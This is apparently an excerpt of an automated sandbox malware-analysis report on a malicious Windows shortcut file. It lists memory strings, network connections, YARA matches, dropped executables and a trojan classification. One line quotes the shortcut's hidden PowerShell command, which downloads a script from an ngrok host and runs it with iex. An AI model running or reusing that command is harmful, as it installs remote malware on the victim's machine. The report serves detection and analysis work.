                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25B0F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25A1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B17000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AF8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25B04000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000006.00000003.1915561956.000001BA25A82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49795 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_4765e3cd-1
                      Source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_8220639f-3
                      Source: Yara matchFile source: 29.3.854113748.exe.2ff0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.58b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.854113748.exe.2dd0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.854113748.exe.2ff0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.fontdrvhost.exe.5690000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 854113748.exe PID: 416, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 8100, type: MEMORYSTR

                      System Summary

                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe File dump: PerfectouinVans.exe.26.dr 979567347
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\854113748.exe
                      Source: 751ietQPnX.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A1CF4 NtAcceptConnectPort,CloseHandle,34_2_000001795E5A1CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A1AA4 NtAcceptConnectPort,NtAcceptConnectPort,34_2_000001795E5A1AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A0AC8 NtAcceptConnectPort,NtAcceptConnectPort,34_2_000001795E5A0AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 34_2_000001795E5A15C0 NtAcceptConnectPort,34_2_000001795E5A15C0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00460070: DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,26_2_00460070
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,26_2_0041E0F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,29_2_0041E0F0
                      Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\854113748.exe AA0DE67AABBC67EFFDEEF899E9B68E072AA927BFEC1D95202740702615FE06F6
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe 3A101A1B1DCDAB3321FA1157C86B3A418965F542051FF70AF24FA0B9B4CA9D85
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 00474096 appears 338 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 005FCD90 appears 33 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0040AC20 appears 36 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0044E7B0 appears 38 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: String function: 0040AB60 appears 32 times
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444
                      Source: classification engineClassification label: mal100.troj.evad.winLNK@90/359@21/14
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,26_2_0041E0F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,26_2_00419CF0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,26_2_00419D90
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,29_2_0041E0F0
